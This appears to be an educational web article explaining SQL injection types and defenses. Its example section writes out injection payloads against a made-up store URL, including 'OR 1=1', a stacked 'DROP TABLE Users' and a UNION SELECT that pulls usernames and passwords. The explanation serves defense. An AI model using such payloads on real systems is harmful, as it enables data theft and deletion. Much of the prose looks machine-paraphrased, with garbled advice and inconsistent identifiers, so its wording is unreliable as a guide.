What Is SQL Injection? How to Protect against SQL Injection Attacks?

SQL Injection (SQLi) is a type of injection attack which allows for dangerous SQL statements. These statements control the database server running behind an online application. The attackers can exploit SQL Injection vulnerabilities to bypass applications security measures. They could bypass authentication and authorization for web pages or web application to access information from the material of the complete SQL database. They also can utilize SQL Injection to add, alter, or remove records from the database.

The SQL Injection vulnerability may affect any website or web app which utilizes an SQL database, such as MySQL, Oracle, SQL Server, and many others. Criminals could exploit it to get an unauthorized access to your private data such as customer data. SQL Injection attacks are one of the earliest, most frequent, and risky web application security vulnerability.

Types of SQL Injections:

SQL injections are typically classified into three categories that include: The three categories are: In-band SQLi (Classic) and inferential SQLi (Blind) or Out of-band SQLi.

1.In Band SQLi:

The attacker makes use of the same communication channel for launching their attacks and to record their payoff. In-band SQLi's simplicity and effectiveness makes it among the most popular kinds that SQLi attack. There are two variations of this technique:

• Error Based SQLi:

The attacker takes actions that result in the database producing errors. The attacker may make use of the data that are provided by the error message to collect information regarding the structure of the database.

• Union Based SQLi:

This technique exploits using the UNION SQL operator that blends many select statements created by the database to create the same HTTP response. The response could contain data that could be used by an attacker.

2.Inferential (Blind) SQLi:

The attacker transmits data in the form of payloads, and then observes the response and actions of the server in order to find out the structure of its data. This technique is referred to as "blind" SQLi since the data does not get transferred from the website's database to the attacker, and the attacker can't see information about the attack while in-band.

• Boolean:

That an attacker transmits an SQL query through the database. This prompts the application to produce the result. The results will differ depending upon whether the query was genuine or not. Based on the results the data contained in the HTTP response may change or remain unchanged. The attacker will then figure to determine if the request generated an accurate or false outcome.

• Time Based:

Attacker is able to send an SQL message to a database and makes it wait before it responds. The attacker is able to determine from the time it takes for the database to respond, whether the query is genuine or not. Based on the results it is possible to determine whether an HTTP response is immediately or after a time.

3.Out of Band SQLi:

The attacker is able to perform this kind of attack if certain features are activated on the database server utilized by the web-based application. This kind of attack is typically employed as a substitute for the inferential and in-band SQLi methods.

Out-of-band SQLi occurs in situations where the attacker cannot make use of this same method to initiate the attack and gather data or if the server is slow or unstable to allow the actions to be carried out. These techniques rely on the capability that the server has to make DNS as well as HTTP requests that transfer data to the attacker.

SQL Injection Example:

An attacker wishing to execute SQL injection manipulates a standard SQL query to exploit non-validated input vulnerabilities in a database. There are many ways that this attack vector can be executed, several of which will be shown here to provide you with a general idea about how SQLI works.

For example, the above-mentioned input, which pulls information for a specific product, can be altered to read http://www.estore.com/items/items.asp?itemid=999 or 1=1.

As a result, the corresponding SQL query looks like this:

SELECT ItemName, ItemDescription

FROM Items

WHERE ItemNumber = 999 OR 1=1

And since the statement 1 = 1 is always true, the query returns all of the product names and descriptions in the database, even those that you may not be eligible to access.

Attackers are also able to take advantage of incorrectly filtered characters to alter SQL commands, including using a semicolon to separate two fields.

For example, this input http://www.estore.com/items/iteams.asp?itemid=999; DROP TABLE Users would generate the following SQL query:

SELECT ItemName, ItemDescription

FROM Items

WHERE ItemNumber = 999; DROP TABLE USERS

As a result, the entire user database could be deleted.

Another way SQL queries can be manipulated is with a UNION SELECT statement. This combines two unrelated SELECT queries to retrieve data from different database tables.

For example, the input http://www.estore.com/items/items.asp? itemed=999 UNION SELECT user-name, password FROM USERS produces the following SQL query:

SELECT ItemName, ItemDescription

FROM Items

WHERE ItemID = '999' UNION SELECT Username, Password FROM Users;

Using the UNION SELECT statement, this query combines the request for item 999’s name and description with another that pulls names and passwords for every user in the database.

How to Protect Against SQL Injection Attacks?

When creating your web site or application, you should implement security measures to limit your vulnerability to SQL injection attacks. For instance these security preventative methods will be most efficient strategies to stop SQL injection attacks

• Install the most up-to-date application as well as security updates from the vendors as soon as they are they are available.

• Allow accounts that connect directly to SQL database the necessary privileges.

• Don't share databases on different applications and websites.

• Validate all kinds of input from the user, such as drop-down menus.

• Set up error reporting instead of sending errors to the client's web browser.

• Prepare statements using parameterized queries that define every aspect of aspects of SQL code and include each parameter, so that attackers cannot alter the purpose of the query later on.

• Utilize stored procedures to create SQL statements that contain parameters that are saved in the database. They can be accessed directly from the application.

• Validate input together allow list to stop input from users who are not validated from being included in query.

• Remove all input from the user prior to inserting it into a query to ensure that it doesn't get confused with SQL code that comes from the developer.

In general, companies must avoid together shared accounts in order to ensure attackers don't collect additional access to the database if one accounts is compromised. It is also recommended that organizations avoid sending errors from databases to web browsers of the client as attackers may make use of that information to determine the technical aspects of the database.